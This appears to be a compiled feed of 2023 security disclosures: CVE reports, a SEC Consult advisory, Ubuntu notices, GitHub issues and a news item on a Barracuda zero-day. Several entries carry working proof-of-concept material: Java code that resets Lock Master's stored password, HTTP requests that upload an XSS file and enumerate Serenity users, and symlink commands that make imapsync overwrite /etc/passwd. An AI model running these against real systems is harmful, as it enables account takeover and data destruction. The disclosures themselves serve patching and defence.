The Lock Master app 2.2.4 for Android allows unauthorized apps to modify the values in its SharedPreference files. These files hold data that affects many app functions. Malicious modifications by unauthorized apps can cause security issues, such as functionality manipulation, resulting in a severe escalation of privilege attack.

**Escalation of Privileges exists in Lock Master（CVE-2023-29733）**

Vendor：DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product：Lock Master (com.ludashi.superlock)

Version：2.2.4

Download link：https://app-lock-master.en.uptodown.com/android/download

Description of the vulnerability for use in the CVE：The Lock Master app 2.2.4 for Android allows unauthorized apps to modify the values in its SharedPreference files. These files hold data that affects many app functions. Malicious modifications by unauthorized apps can cause security issues, such as functionality manipulation, resulting in a severe escalation of privilege attack.

Additional information：Lock Master is a security app, which can block access to user's apps or files with lock patterns. Lock Master stores user-set PIN and pattern passwords, as well as important settings (such as the name of the app package that the user chooses to lock), in the SharedPreferences file. The file is loaded when the app is initialized and performs the corresponding operations. However, if a malicious application tampers with the data in the SharedPreferences file, it can control the relevant functions of the app, causing serious security consequences such as changing the user's password and arbitrarily specifying the application to be locked.

poc：

ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.superlock.main.SharedPrefProvider");  
ContentValues contentValues = new ContentValues();
while(true){
  contentValues.put("file\_name","lock\_config.xml");
	contentValues.put("type",4);
	contentValues.put("key","key\_pattern\_pwd");
	contentValues.put("value","123456");
	contentResolver.update(uri, contentValues,null,null);
}

CVE-2023-29733: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

Serenity and StartSharp Software versions prior to 6.7.1 suffer from file upload to cross site scripting, user enumeration, and reusable password reset token vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230516-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Serenity and StartSharp Software  
  vulnerable version: < 6.7.1  
       fixed version: 6.7.1 or higher  
          CVE number: CVE-2023-31285, CVE-2023-31286, CVE-2023-31287  
              impact: high  
            homepage: https://serenity.is  
               found: 2023-02-28  
                  by: Fabian Densborn (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an Atos business  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
Serenity Software is a software vendor that distributes the Serenity Platform.  
"Serenity is an ASP.NET Core / TypeScript application platform designed to  
simplify and shorten development of data-centric business applications with  
a service based architecture."

Source: https://github.com/serenity-is

Business recommendation:  
------------------------  
SEC Consult recommends Serenity users to install the latest update and review  
the vendor's changelog for further information.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285)  
The application allows users to upload profile pictures for users.  
It was identified that an attacker has the possibility to upload  
arbitrary malicious files. Although some specific file endings are  
not allowed, it is still possible to upload files without an extension.

It was possible to:  
• Upload malicious HTML files that will infect the user's browser with malicious  
   JavaScript. As a result, the user's DOM is fully compromised.  
• Upload malware that will infect the user's operating system upon download and  
   local execution.

Note:  
Although the option for uploading new profile pictures is only visible to power users,  
users with lower privileges can still trigger the upload functionality.

2) User Enumeration (CVE-2023-31286)  
It is possible to collect valid email addresses by interacting with the  
"forgot password" function of the application. This vulnerability is  
useful to increase the efficiency of brute-force attacks. If the email  
address is known, it is easier to find the corresponding password.

3) Reusable Password Reset Tokens (CVE-2023-31287)  
The web application provides the possibility to reset the password via  
email. The corresponding email contains a password reset link which includes  
a user-specific token. When visiting the link, the user can set a new  
password for this account. After changing the password, the password reset link  
remains valid (3 hours) and can be used a second time to change the password  
of the user.

Proof of concept:  
-----------------  
1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285)  
A user can upload arbitrary files to the server, but some file extensions  
like .aspx are not allowed. Nevertheless, malicious files like Word documents  
with enabled macros or other executable malware can be uploaded. There also  
seems to be no anti-virus scan enabled for these files, as it is possible to  
upload the EICAR test file which is flagged as malicious by all antivirus  
software.

Additionally, it is also possible to attack a privileged power user, by  
generating a malicious HTML page, that on visit escalates the role of the  
attacker user. This is possible, because the file is uploaded to the same  
domain and therefore the containing JavaScript executes in the same context as  
the application. The impact of this vulnerability is therefore equal to that  
of a stored XSS vulnerability.

To upload a malicious HTML file an authenticated user without the role of a  
power user can send the following request:  
--------------------------------------------------  
POST /File/TemporaryUpload HTTP/2  
Host: demo.serenity.is  
Cookie: [...]  
Content-Type: multipart/form-data; boundary=--boundary  
Origin: https://demo.serenity.is  
[...]

--boundary  
Content-Disposition: form-data; name="Serenity_ImageUploadEditor31[]"; filename="test.html"  
Content-Type: image/png

<html>  
<head></head>  
<body>  
<h1>SEC Consult</h1>  
<script>alert(document.domain)</script>  
</body>  
</html>  
--boundary--  
--------------------------------------------------

The response reveals the path of the uploaded file:  
--------------------------------------------------  
HTTP/2 200 OK  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json  
[...]

{  
     "TemporaryFile":"temporary/f3c960aca7724409a3c4c6e597ce5b92.html",  
     "Size":110,  
     "IsImage":false,  
     "Width":0,  
     "Height":0  
}  
--------------------------------------------------

The uploaded file can then be found under /upload/temporary/f3c960aca7724409a3c4c6e597ce5b92.html.

The final link will look benign thus it is possible to attack administrator  
users and escalate the privileges of the own user.

2) User Enumeration (CVE-2023-31286)  
The "forgot password" page lets users request a new password reset mail.  
They need to enter their email address which corresponds to their account  
and receive a mail containing a link to reset their password. Unfortunately,  
the response of this request leaks if a user with the provided email address  
exists or not. If an attacker wants to check if a user account with a  
specific email exists, he can send the following request:

--------------------------------------------------  
POST /Account/ForgotPassword HTTP/2  
Host: demo.serenity.is  
Origin: https://demo.serenity.is  
Content-Type: application/json  
[...]

{  
     "Email":"emailToCheck@sec-consult.com"  
}  
--------------------------------------------------

If the user with this mail does not exist, the response will look like this:  
--------------------------------------------------  
HTTP/2 400 Bad Request  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json

{  
     "Error": {  
         "Code":"CantFindUserWithEmail",  
         "Message":"Can't find a user with that e-mail adress!"  
     }  
}  
--------------------------------------------------

If the user with this mail address does exist, the response will look like  
this:  
--------------------------------------------------  
HTTP/2 200 OK  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json  
[...]

{}  
--------------------------------------------------

3) Reusable Password Reset Tokens (CVE-2023-31287)  
When resetting the password via the "forgot password" functionality on the  
login screen, an email containing a password reset link is sent to the user.  
When clicking on this link, a user can choose a new password for his account.  
However, after changing the password to a new one, the password reset link  
remains valid. It can be used a second time to update the user's password  
although it was already changed. If an attacker gets access to the browser  
history of the user, he can change the password of the user's account and  
access it afterwards.

Vulnerable / tested versions:  
-----------------------------  
The following versions are affected:  
< 6.7.0

Vendor contact timeline:  
------------------------  
2023-04-05: Contacting vendor through sales@serenity.is  
2023-04-05: Vendor responds to send advisory to support@serenity.is  
2023-04-05: Advisory sent to vendor.  
2023-04-06: Vendor released fixes for all three vulnerabilities,  
             file upload vulnerability was not fixed properly though.  
2023-04-07: SEC Consult informs vendor about not properly fixed file upload.  
2023-04-07: Vendor released proper fix for file upload vulnerability in v6.7.1.  
2023-04-27: CVE numbers assigned.  
2023-05-16: Public release of security advisory.

Solution:  
---------  
The vendor provides a patch v6.7.1 which includes the fixes for the identified  
security issues.

The new version can be downloaded here:  
https://github.com/serenity-is/Serenity

The vendor explicitly notes the following in the changelog:

"Serene/StartSharp users must either create a new project from the 6.7.0+ template  
or manually apply the relevant changes from this commit to their existing  
applications after updating Serenity packages to 6.7.0+"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an Atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an Atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Fabian Densborn / @2023

Serenity / StartSharp Software File Upload / XSS / User Enumeration / Reusable Tokens

Widevine Trustlet versions 5.x suffer from a buffer overflow vulnerability in drm_save_keys at 0x69b0.

==========================================================================  
Ubuntu Security Notice USN-6118-1  
May 30, 2023

linux-oracle, linux-oracle-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-oracle-5.4: Linux kernel for Oracle Cloud systems

Details:

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-oracle   5.4.0-1101.110  
   linux-image-oracle-lts-20.04    5.4.0.1101.94

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1101-oracle   5.4.0-1101.110~18.04.1  
   linux-image-oracle              5.4.0.1101.110~18.04.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6118-1  
   CVE-2022-3707, CVE-2023-0459, CVE-2023-1075, CVE-2023-1078,  
   CVE-2023-1118, CVE-2023-1513, CVE-2023-2162, CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1101.110  
   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1101.110~18.04.1

Ubuntu Security Notice USN-6118-1

Ubuntu Security Notice 6115-1 - Max Chernoff discovered that LuaTeX did not properly disable shell escape. An attacker could possibly use this issue to execute arbitrary shell commands.

==========================================================================  
Ubuntu Security Notice USN-6115-1  
May 30, 2023

texlive-bin vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

LuaTeX (TeX Live) could be made to run programs as your login if it  
compiled a specially crafted TeX file.

Software Description:  
- texlive-bin: Binaries for TeX Live

Details:

Max Chernoff discovered that LuaTeX (TeX Live) did not properly disable  
shell escape. An attacker could possibly use this issue to execute  
arbitrary shell commands.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  texlive-binaries                2022.20220321.62855-5ubuntu0.1

Ubuntu 22.10:  
  texlive-binaries                2022.20220321.62855-4ubuntu0.1

Ubuntu 22.04 LTS:  
  texlive-binaries                2021.20210626.59705-1ubuntu0.1

Ubuntu 20.04 LTS:  
  texlive-binaries                2019.20190605.51237-3ubuntu0.1

Ubuntu 18.04 LTS:  
  texlive-binaries                2017.20170613.44572-8ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6115-1  
  CVE-2023-32700

Package Information:  
  https://launchpad.net/ubuntu/+source/texlive-bin/2022.20220321.62855-5ubuntu0.1  
  https://launchpad.net/ubuntu/+source/texlive-bin/2022.20220321.62855-4ubuntu0.1  
  https://launchpad.net/ubuntu/+source/texlive-bin/2021.20210626.59705-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/texlive-bin/2019.20190605.51237-3ubuntu0.1  
  https://launchpad.net/ubuntu/+source/texlive-bin/2017.20170613.44572-8ubuntu0.2

Ubuntu Security Notice USN-6115-1

Ubuntu Security Notice 6113-1 - It was discovered that Jhead did not properly handle certain crafted images while processing the Exif markers. An attacker could possibly use this issue to crash Jhead, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6113-1May 30, 2023Jhead vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Jhead could be made to crash if it opened a specially craftedfile.Software Description:- jhead: Manipulate the non-image part of Exif compliant JPEG filesDetails:It was discovered that Jhead did not properly handle certain crafted imageswhile processing the Exif markers. An attacker could possibly use thisissue to crash Jhead, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS (Available with Ubuntu Pro):   jhead                           1:3.00-4+deb9u1ubuntu0.1~esm4Ubuntu 14.04 LTS (Available with Ubuntu Pro):   jhead                           1:2.97-1+deb8u2ubuntu0.1~esm4In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6113-1   CVE-2018-6612

Ubuntu Security Notice USN-6113-1

The Elementor Website Builder WordPress plugin before 3.12.2 does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.

CVE-2023-0329

Kanboard is project management software that focuses on the Kanban methodology. Due to improper handling of elements under the `contentEditable` element, maliciously crafted clipboard content can inject arbitrary HTML tags into the DOM. A low-privileged attacker with permission to attach a document on a vulnerable Kanboard instance can trick the victim into pasting malicious screenshot data and achieve cross-site scripting if CSP is improperly configured. This issue has been patched in version 1.2.29.


Expand Up

@@ -36,7 +36,7 @@ KB.component('screenshot', function (containerElement) {

  

if (! window.Clipboard) {

// Insert the content editable at the top to avoid scrolling down in the board view

pasteCatcher \= document.createElement('div');

pasteCatcher \= document.createElement('template');

pasteCatcher.id \= 'screenshot-pastezone';

pasteCatcher.contentEditable \= true;

pasteCatcher.style.opacity \= 0;

Expand Down

CVE-2023-32685: Avoid potential clipboard based cross-site scripting · kanboard/kanboard@26b6eeb

imapsync through 2.229 uses predictable paths under /tmp and /var/tmp in its default mode of operation. Both of these are typically world-writable, and thus (for example) an attacker can modify imapsync's cache and overwrite files belonging to the user who runs it.

I was running imapsync recently and noticed this flag description,

      --pidfile      str  : The file where imapsync pid is written,
                            it can be dirname/filename complete path.
                            The default name is imapsync.pid in tmpdir.
    

This was a red flag because using predictable filenames under /tmp is a well-known source of vulnerabilities: https://owasp.org/www-community/vulnerabilities/Insecure\_Temporary\_File

In this case, I verified that (with the default options), imapsync can be tricked into overwriting files belonging to other users. The simplest proof-of-concept uses a symlink. Newer linux distributions enable a sysctl to protect against this specific attack, but the example should still work on a vanilla kernel or on other UNIX systems, and more complicated attacks (not involving a symlink) are possible.

If you're on linux, start by ensuring that the aforementioned sysctl is disabled:

    root # sysctl fs.protected_symlinks=0
    

Now, as a normal user, create a symlink from /tmp/imapsync.pid to /etc/passwd:

    mjo $ ln -s /etc/passwd /tmp/imapsync.pid
    

This works because /tmp is world-writable. Anyone can create a file, directory, or symlink at that location before imapsync tries to use it. Now, run imapsync as root:

    root # imapsync <whatever>
    

You'll find that /etc/passwd, belonging to root, has essentially been deleted by the unprivileged user. Most file operations will follow a symlink, and in this case, the PID file was written to /etc/passwd.

The fundamental issue is that /tmp is world-writable by design which leads to all sorts of exploits like this. There are a lot of complicated and clever workarounds needed to make using /tmp (or /var/tmp) secure. In C, there are standard functions like mkstemp() that will create a temporary file securely. I'm not much of a perl programmer, but I believe File::Temp does the same thing in perl.

The imapsync_cache directory has the same issue; I can create it before you run imapsync and then I'm allowed to modify your cache. And while I haven't tried it, I would expect that $CGI_TMPDIR_TOP and $CGI_HASHFILE have a similar fate.

CVE-2023-34204: Secure /tmp usage · Issue #399 · imapsync/imapsync

In Moov signedxml through 1.0.0, parsing the raw XML (as received) can result in different output than parsing the canonicalized XML. Thus, signature validation can be bypassed via a Signature Wrapping attack (aka XSW).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

elwint opened this issue

Jan 18, 2023

· 12 comments · Fixed by #25

Closed

**Critical security vulnerability #23**

elwint opened this issue

Jan 18, 2023

· 12 comments · Fixed by #25

**Comments**

I would like to report a potentially critical security vulnerability, however I couldn't find a way to contact you. Could you please provide contact details?

@elwint did you hear back? I'm curious what you found.

@adamdecaf I haven't heard back from him regarding the vulnerability. He only told me he hasn't been actively maintaining/using this library for a while.

My recommendation would be to use a more established library for signature validation, e.g. https://github.com/russellhaering/goxmldsig

@ma314smith What are your plans for this library? I will disclose more information about the vulnerability next week.

 elwint changed the title Potentially critical security vulnerability Critical security vulnerability

Mar 24, 2023

Thanks @elwint, I've tried using goxmldsig and haven't had luck. It's a bit too specific for SAML and my use-case fails validation. We're working on a fork/update to goxmldsig, but that isn't very active either.

@adamdecaf as you suggested in your PR, I'm open to handing this off if you're interested.

I can forward you the info from @elwint and you can decide. Sounds like maybe it wasn't as critical as initially thought.

@ma314smith Thanks for your reply, but note to other users, the vulnerability is critical if the signed payload returned by ValidateReferences is not used, or if the deprecated Validate function was used, and the document is parsed by Go’s XML unmarshaller.

Thanks, yes this looks to be mostly resolved with ValidateReferences. Callers need to check/use the returned references though.

@adamdecaf I think the vulnerability is still present and should be properly mitigated, the deprecated Validate function still exists, which should be removed (also in the readme). The references returned by ValidateReferences are not always checked/used by callers, so perhaps something can be implemented to mitigate the attack. Can you also create a GitHub security advisory to inform users about the vulnerability?

adamdecaf added a commit that referenced this issue

Apr 21, 2023

I've removed references to .Validate() in the readme and tests, but I am seeing one case where ValidateReferences() returns a ref I don't think it should. Do you have a better example for checking references?

We can create a security advisory on pre-1.0 releases. We're planning a 1.0 release soon.

@elwint could you provide more background and details on what security vulnerability exists. @adamdecaf and I are very interesting in fixing any vulnerabilities. With regards the Validate() and ValidateReferences() methods, the validate() method validates signed XML. It does this by applying some transforms to the xml that canonicalize it before checking the signature. If the validation succeeds, then XML received is guaranteed to semantically match what was signed. The strings returned from the ValidateReferences() method are just the canonicalized XML. Nothing in the canonicalization process changes the semantics of the XML, so once a signature is validated there is no reason to use the canonicalized XML as opposed to the received XML. They both represent the same information. @elwint is this at all related to your concerns?

@adamdecaf I'm not sure what would be the best way to mitigate the attack without affecting legitimate use. However, the same attack doesn't work in goxmldsig because it always checks if the signature is referencing the top-element of the XML. Perhaps something similar can be implemented?

@rowland66 The vulnerability exists when the received XML is parsed by Go's XML unmarshaller, instead of the signed payload returned by ValidateReferences. Parsing the received raw XML can result in a different output than parsing the signed payload/canonicalized XML. This makes it possible to bypass the signature validation using a Signature Wrapping attack (XSW). Adam should've received an email earlier containing more information about the vulnerability and a PoC that exploits the vulnerability.

Because a signature validation bypass is possible when the deprecated Validate function is used, it should be removed entirely. This may be a breaking change, but at least it cannot be used anymore.

> Because a signature validation bypass is possible when the deprecated Validate function is used, it should be removed entirely. This may be a breaking change, but at least it cannot be used anymore.

Agreed.

CVE-2023-34205: Critical security vulnerability · Issue #23 · moov-io/signedxml

Categories: Exploits and vulnerabilities
Categories: News
Barracuda Networks issued a patch for a zero-day vulnerability in its Email Security Gateway that was actively being exploited



(Read more...)




The post Barracuda Networks patches zero-day vulnerability in Email Security Gateway appeared first on Malwarebytes Labs.

On May 20, Barracuda Networks issued a patch for a zero day vulnerability in its Email Security Gateway (ESG) appliance. The vulnerability existed in a module which initially screens the attachments of incoming emails, and was discovered on May 19.

Barracuda's investigation showed that the vulnerability resulted in unauthorized access to a subset of email gateway appliances. A remote unauthenticated attacker could send a specially crafted archive to the appliance and execute arbitrary Perl commands on the target system. The affected versions of ESG are 5.1.3 - 9.2.

Consequently a security patch to eliminate the vulnerability was applied to all ESG appliances worldwide on Saturday, May 20. After further investigation a second patch was sent out on May 21, 2023.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE patched in these updates is:

CVE-2023-2868: CVSS score 9.4 out of 10. A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only). The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker could specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.

Barracuda says users whose appliances are believed to be impacted have been notified via the ESG user interface about the actions they need to take. It says it has also reached out to these specific customers. Updates will be posted to the product status page.

The Cybersecurity & Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The due date for FCEB agencies for this vulnerability is June 16, 2023. CISA also warned that these types of vulnerabilities are frequent attack vectors for malicious cyberactors and pose a significant risks to the federal enterprise.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Tag

#perl